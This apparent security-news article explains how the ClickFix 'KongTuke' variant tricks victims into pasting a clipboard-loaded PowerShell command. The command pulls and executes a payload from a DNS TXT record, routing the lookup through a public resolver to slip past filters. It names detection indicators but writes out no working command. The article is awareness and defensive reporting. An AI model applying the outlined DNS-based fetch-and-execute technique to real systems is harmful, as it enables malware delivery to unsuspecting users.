Sunday 05 July 2026 04:18:35 GMT+02:00

Netcrook

HomeManifesto
News
Techcrook
Geocrook
WikicrookTeamAppContact
EnglishItalianoArabic

Security Awareness & Social Engineering

DNS Sleight of Hand: How ClickFix’s New KongTuke Variant Outsmarts Cyber Defenses

Published: 05 February 2026 06:01Category: Security Awareness & Social EngineeringAuthor: CRYSTALPROXY

Subtitle: Cybercriminals are hiding malware inside DNS records and tricking victims into running it, bypassing classic security controls.

It starts with a simple, familiar test: “Prove you’re human.” But behind this innocuous challenge lies a sophisticated new cyberattack that’s rewriting the playbook on evasion. In a series of recent incidents, attackers have weaponized the humble DNS TXT record, using it as a covert channel to deliver malicious PowerShell commands straight onto unsuspecting victims’ machines. Welcome to the era of KongTuke: a cunning evolution of the persistent ClickFix campaign.

Since late December 2025, security analysts have observed a worrying shift in social engineering tactics. The ClickFix campaign-previously known for its deceptive browser update and CAPTCHA prompts-has adopted a new method of payload delivery. Rather than asking for passwords or exploiting browser vulnerabilities, KongTuke lures users into copying and pasting a PowerShell command, conveniently preloaded into their clipboard by the attacker’s JavaScript.

The trick is ingeniously simple. When a victim lands on a compromised or fake site, they’re told to open the Windows Run dialog and paste in a mysterious command. This command doesn’t fetch malware from a conventional website. Instead, it queries a specially crafted DNS TXT record-essentially a hidden message in the domain name system-using PowerShell’s Resolve-DnsName function. By retrieving and immediately executing the contents of this DNS record, the attack sidesteps web filters, firewalls, and many endpoint protections.

To further muddy the waters, the command routes its DNS request through Google’s 8.8.8.8 resolver, bypassing local DNS blocks or security appliances. For network defenders, the traffic appears as a routine DNS query-nothing to raise alarms-while the payload is quietly assembled and executed on the victim’s machine. The result? A second-stage download, often an info-stealer or further malware, is unleashed without ever touching a suspicious URL.

What makes KongTuke especially dangerous is its dynamic targeting. Malicious content is injected only for specific visitors, allowing compromised domains to stay under the radar for days. Security researchers warn organizations to watch for unusual PowerShell executions-especially those involving Resolve-DnsName and iex-and to educate users: no legitimate site will ever ask them to paste commands into the Windows Run dialog.

The rise of DNS-abuse in malware delivery is a reminder that attackers are always searching for overlooked channels. As cybercriminals turn everyday protocols into covert conduits, defenders must adapt, scrutinizing not just what users click, but what they’re persuaded to run. In the battle for trust, a simple “human verification” can be the most dangerous trick of all.

WIKICROOK

  • DNS TXT Record: A DNS TXT record stores text information in the Domain Name System, often for email security, but can be misused to hide data or commands.
  • PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often exploit it to perform malicious actions stealthily.
  • Clipboard Injection: Clipboard injection replaces clipboard content with malicious data, tricking users into pasting harmful code or links. It’s a stealthy and dangerous cyber threat.
  • Execution Policy Bypass: Execution policy bypass lets users run PowerShell scripts by disabling built-in security restrictions, often exploited in cyberattacks to execute unauthorized code.
  • Info: An info stealer is malware that secretly collects sensitive data like passwords and financial details from infected devices and sends it to cybercriminals.